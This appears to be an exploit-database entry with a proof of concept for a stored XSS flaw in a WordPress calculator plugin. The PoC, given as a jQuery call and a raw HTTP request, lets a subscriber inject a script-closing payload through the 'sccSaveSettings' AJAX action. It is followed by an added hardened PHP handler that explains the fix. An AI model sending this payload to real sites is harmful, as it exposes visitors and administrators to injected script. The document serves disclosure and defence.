## https://sploitus.com/exploit?id=WPEX-ID:DB84A782-D4C8-4ABF-99EA-EA672A9B806E
As a subscriber:
```javascript
jQuery.post(ajaxurl,{
action:"sccSaveSettings",
// This can XSS any page that uses the plugin's shortcode
currency_code:"EUR</script><script>alert(/XSS/)</script>",
currency_text:"Euro",
currency_style:"default"})
```
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Connection: close
Cookie: [any authenticated user]

action=sccSaveSettings&currency_code=EUR%3C%2Fscript%3E%3Cscript%3Ealert(/XSS/)%3C%2Fscript%3E&currency_text=Euro&currency_style=default
```
The XSS is triggered when an admin creates or edits a Calculator, or when any user views a calculator embedded in a page.
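The root cause the PoC exercises is an `admin-ajax.php` handler that any logged-in user can call and that stores the submitted values without validation, followed by a render path that echoes them unescaped into page markup. The following PHP is an editor's added example of how such a handler and its render function look once hardened; it is not the plugin's own code, and the hook callback name, the `scc_settings` option name, the `scc_save_settings` nonce action and the allowed `currency_style` values are assumptions. Only the `sccSaveSettings` action name and the three POST parameters come from the PoC above.

```php
<?php
// Added example (not the plugin's code). Names marked "assumed" are hypothetical.

// Register only the authenticated hook; there is deliberately no
// wp_ajax_nopriv_ counterpart, and authorization is still checked inside.
add_action( 'wp_ajax_sccSaveSettings', 'scc_save_settings_hardened' ); // callback name assumed

function scc_save_settings_hardened() {
    // 1. Authorization: a subscriber must not be able to change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 2. CSRF: require the nonce emitted by the settings page (action name assumed).
    check_ajax_referer( 'scc_save_settings', 'nonce' );

    // 3. Input validation: currency_code is allow-listed to three ASCII letters,
    //    so "</script>..." can never be stored in the first place.
    $code = isset( $_POST['currency_code'] )
        ? strtoupper( sanitize_text_field( wp_unslash( $_POST['currency_code'] ) ) )
        : '';
    if ( ! preg_match( '/^[A-Z]{3}$/', $code ) ) {
        wp_send_json_error( array( 'message' => 'invalid currency_code' ), 400 );
    }

    $text = isset( $_POST['currency_text'] )
        ? sanitize_text_field( wp_unslash( $_POST['currency_text'] ) )
        : '';

    $allowed_styles = array( 'default', 'compact' ); // assumed set of styles
    $style = isset( $_POST['currency_style'] ) ? sanitize_key( $_POST['currency_style'] ) : 'default';
    if ( ! in_array( $style, $allowed_styles, true ) ) {
        $style = 'default';
    }

    update_option( 'scc_settings', array( // option name assumed
        'currency_code'  => $code,
        'currency_text'  => $text,
        'currency_style' => $style,
    ) );
    wp_send_json_success();
}

// Output side: stored values are never echoed raw into HTML or an inline script.
function scc_render_inline_config() {
    $settings = get_option( 'scc_settings', array() ); // option name assumed

    // JSON_HEX_TAG encodes '<' and '>' as \u003C and \u003E, so even a stored
    // "</script>" could not terminate the script element.
    $json = wp_json_encode( $settings, JSON_HEX_TAG | JSON_HEX_AMP );
    echo '<script>var sccConfig = ' . $json . ';</script>';

    // When the same values land in HTML attributes or text, use the context-specific
    // escapers (esc_attr / esc_html) rather than trusting the stored value.
    echo '<span data-currency="' . esc_attr( $settings['currency_code'] ?? '' ) . '">'
        . esc_html( $settings['currency_text'] ?? '' ) . '</span>';
}
```

Each layer is independent: the capability check alone would have blocked the subscriber in the PoC, the allow-list alone would have rejected the payload, and the output encoding alone would have rendered it inert. Applying all three means a bug in any one of them does not reopen the stored XSS.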